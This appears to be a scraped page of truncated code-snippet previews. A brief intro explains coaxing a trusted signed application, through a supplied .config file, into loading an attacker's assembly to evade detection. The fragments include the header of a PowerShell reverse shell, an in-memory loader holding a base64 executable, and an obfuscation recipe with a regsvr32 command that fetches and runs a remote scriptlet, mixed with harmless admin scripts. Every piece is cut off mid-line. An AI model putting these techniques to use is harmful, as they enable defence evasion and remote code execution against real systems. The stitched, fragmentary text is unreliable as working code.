We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
| <# | |
| DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls. | |
| The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess. | |
| Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions | |
| from ws2_32.dll. | |
| This script should be used for educational purposes only (and maybe while playing CTF :D). | |
| It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only | |
| purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as |
| function New-TestData { | |
| [CmdletBinding()] | |
| param ( | |
| [Parameter(Mandatory)] | |
| [ValidateScript({Test-Path $_})] | |
| [String]$RootFolder, | |
| # How many subfolders should be created | |
| [Parameter(Mandatory=$false)] | |
| [int] |
| function Get-InactiveUsers { | |
| [CmdletBinding()] | |
| param ( | |
| # Distinguished Names of search bases | |
| [Parameter(Mandatory=$true)] | |
| [String[]] | |
| $DistinguishedName, | |
| # Parameter help description | |
| [Parameter(Mandatory=$false)] |
| @echo off | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| REM °² Enumerates all files extensions ²° | |
| REM °² and what opens them on Windows 10/11 in batch/cmd ²° | |
| REM °² twitter: @ollieatnowhere ²° | |
| REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
| REM ------------------------------------------------------ | |
| REM |
| from __future__ import print_function | |
| import pickle | |
| import os.path | |
| from googleapiclient.discovery import build | |
| from google_auth_oauthlib.flow import InstalledAppFlow | |
| from google.auth.transport.requests import Request | |
| from apiclient import errors | |
| import re | |
| from bs4 import BeautifulSoup as Soup |
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
| param( | |
| [string]$pattern = "*.*", | |
| [ValidateSet("md5", "sha1", "sha256", "sha384", "sha512")]$algorithm = "sha1", | |
| [switch]$recurse | |
| ) | |
| [Reflection.Assembly]::LoadWithPartialName("System.Security") | out-null | |
| if ($algorithm -eq "sha1") { | |
| $hashimpl = new-Object System.Security.Cryptography.SHA1Managed |
| 1. Macro Web_Delivery + Invoke-Obfuscation | |
| Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' | |
| e.g | |
| import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' | |